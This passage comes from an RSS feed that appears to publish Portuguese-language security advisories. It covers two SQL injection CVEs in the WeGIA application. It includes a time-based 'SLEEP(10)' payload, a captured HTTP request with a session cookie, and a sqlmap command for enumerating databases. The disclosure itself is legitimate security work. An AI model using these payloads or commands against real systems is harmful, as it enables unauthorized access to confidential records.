        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53946-vulnerabilidade-de-injeção-sql-no-parâmetro-id_fichamedica-do-endpoint-profile_pacientephp&amp;#34;&amp;gt;CVE-2025-53946: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/saude/profile_paciente.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53946-vulnerabilidade-de-injeção-sql-no-parâmetro-id_fichamedica-do-endpoint-profile_pacientephp&amp;#34;&amp;gt;CVE-2025-53946: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53946&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/saude/profile_paciente.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/saude/profile_paciente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_fichamedica&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  1&#43;AND&#43;SLEEP(10)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;exploração-manual&amp;#34;&amp;gt;Exploração Manual:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53946/image.png&amp;#34;
	width=&amp;#34;1280&amp;#34;
	height=&amp;#34;602&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53946/image_hu_446a5f0aca967603.png 480w, /p/cve-2025-53946/image_hu_88f973a4b4b6d596.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;212&amp;#34;
		data-flex-basis=&amp;#34;510px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53946/image-1.png&amp;#34;
	width=&amp;#34;1280&amp;#34;
	height=&amp;#34;588&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53946/image-1_hu_10a28eb522607c.png 480w, /p/cve-2025-53946/image-1_hu_2b701927703256a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;217&amp;#34;
		data-flex-basis=&amp;#34;522px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sqlmap&amp;#34;&amp;gt;Sqlmap:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53946/image-2.png&amp;#34;
	width=&amp;#34;859&amp;#34;
	height=&amp;#34;660&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53946/image-2_hu_d8d1038b65332cf7.png 480w, /p/cve-2025-53946/image-2_hu_144f09ecde05299.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;130&amp;#34;
		data-flex-basis=&amp;#34;312px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54058</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54058/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54058/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54058-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarenderecophp&amp;#34;&amp;gt;CVE-2025-54058: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;dependente_editarEndereco.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/dependente_editarEndereco.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54058-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarenderecophp&amp;#34;&amp;gt;CVE-2025-54058: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;dependente_editarEndereco.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54058&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/html/funcionario/dependente_editarEndereco.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/funcionario/dependente_editarEndereco.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Salve a requisição no arquivo &amp;lt;code&amp;gt;req.txt&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  POST /html/funcionario/dependente_editarEndereco.php?id_pessoa=3&amp;amp;amp;idatendido_familiares=1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Length: 125
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Origin: https://demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g1$t1751262251$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=ogoa4lr4nrqqudih73o8oj76p1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  cep=52011-040&amp;amp;amp;uf=PE&amp;amp;amp;cidade=Recife&amp;amp;amp;bairro=Gra%C3%A7as&amp;amp;amp;rua=Avenida&#43;Rui&#43;Barbosa&amp;amp;amp;numero_residencia=12&amp;amp;amp;complemento=12&amp;amp;amp;ibge=2611606
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Então, use o &amp;lt;code&amp;gt;sqlmap&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54058/image.png&amp;#34;
	width=&amp;#34;864&amp;#34;
	height=&amp;#34;755&amp;#34;
	srcset=&amp;#34;/p/cve-2025-54058/image_hu_464b5ea2f7936886.png 480w, /p/cve-2025-54058/image_hu_4782a5da1e37635e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;274px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
